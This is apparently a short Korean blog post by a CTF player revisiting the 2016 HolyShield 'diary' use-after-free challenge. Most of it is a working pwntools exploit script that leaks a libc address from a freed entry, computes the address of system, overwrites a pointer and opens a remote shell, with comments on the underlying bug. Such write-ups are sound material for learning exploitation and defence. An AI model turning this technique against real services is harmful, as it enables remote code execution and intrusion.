2016 holyshield diary
by St1tch
use after free bug 문제이다.
대회 때 못 풀어서, 학교 셤 끝나고 다시 풀어보았다.
빨리 review 문제도 풀어야겠다.
from pwn import *
# Connection setup: either run the binary locally (printing its pid and
# pausing so a debugger can be attached) or talk to the contest instance.
# NOTE(review): host and port are hard-coded for that contest instance.
local = False
if not local:
    s = remote('kimtae.xyz', 9989)
else:
    s = process('./diary')
    print(util.proc.pidof(s))  # pid of the spawned process, for attaching
    pause()
def command(token, *args):
    """Wait for *token* on the connection, then send each of *args* as a line.

    Every argument is converted with ``str()`` before sending, so ints are
    accepted.  Uses the module-level connection ``s``; returns nothing.
    """
    s.recvuntil(token)
    for value in args:
        s.sendline(str(value))
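def fast(token, *args):
    """Thin alias for :func:`command` (same contract: wait for *token*, then
    send each argument as a line).

    Written as a ``def`` rather than a lambda bound to a name (PEP 8, E731)
    so tracebacks and ``repr`` show a real function name.
    """
    return command(token, *args)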
def solver():
    """Drive the ``diary`` service through its use-after-free, step by step.

    The menu is walked in a fixed order: log in, create two plans, free one,
    read a plan name back (the leak), then go through the two "game" prompts
    and finally drop to an interactive session.  Every send below is a raw
    protocol step against the remote prompts, so the order and the exact
    prompt strings must not be changed.

    For a defender, the line to look at is the ``Plan name`` read that
    follows ``'plan free...'``: the service still prints data from a plan
    that was just freed, i.e. it keeps dereferencing a dangling pointer.
    Clearing the pointer on free (or refusing to display a freed entry) is
    what removes the leak.
    """
    log.success('login...')
    # Login prompt: the name sent is a NUL-terminated '/bin/sh', then '25'.
    fast(':', '/bin/sh\x00', '25')
    fast('>', '3')
    # The literal text 'rop payload' is what is sent here, nothing else.
    fast(':', 'rop payload')
    log.success('plan create...')
    # Two plans are created with identical contents (menu '1', then '2').
    fast('>', '1', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    fast('>', '2')
    fast(':', 'stitch', '7', '7', 'stitch')
    log.success('plan free...')
    # Menu '4' is the free (per the log line above); '100' is its argument.
    fast('>', '4', '100')
    log.success('addr leak...')
    fast('>', '1')
    s.recvuntil('Plan name : ')
    # Six bytes come back after the freed plan is shown; two NULs pad them
    # to a little-endian 64-bit value for u64().
    leak = s.recv(6)+'\x00\x00'
    # Fixed offset from the leaked value; the log line below labels the
    # result as the system address.  The constant is tied to the target's
    # libc build and is not portable.
    target = hex(u64(leak) - 3663848)
    # target is a '0x…' string.  For a 12-hex-digit (48-bit) address,
    # target[-8:] is the low 32 bits (packed as 4 bytes) and target[2:6]
    # the top 16 bits; both are fed back through the game prompts below.
    addr = p32(int(target[-8:],16))
    score = int(target[2:6], 16) - 100
    log.info('system addr = {0}'.format(target))
    log.success('game 1 go...')
    fast('>', '6', '3', '1', '100')
    s.recvuntil('.\n')
    s.sendline('3')
    s.recvuntil('comment\n')
    s.sendline('fuck!')
    log.success('game 2 go...')
    # The negated score is sent as text ('-' + digits).
    fast('>', '1', '-'+str(score))
    s.recvuntil('.\n')
    s.sendline('3')
    fast('>', str(score+100), '3')
    s.recvuntil('comment\n')
    # 84 filler bytes followed by the 4-byte packed low half of the address.
    s.sendline('a'*84 + addr)
    log.success('get shell !! ')
    fast('>', '3', '1', '1')
    # Hand the connection to the user.
    s.interactive()
if __name__ == "__main__":
    # Run the driver only when executed as a script, never on import.
    solver()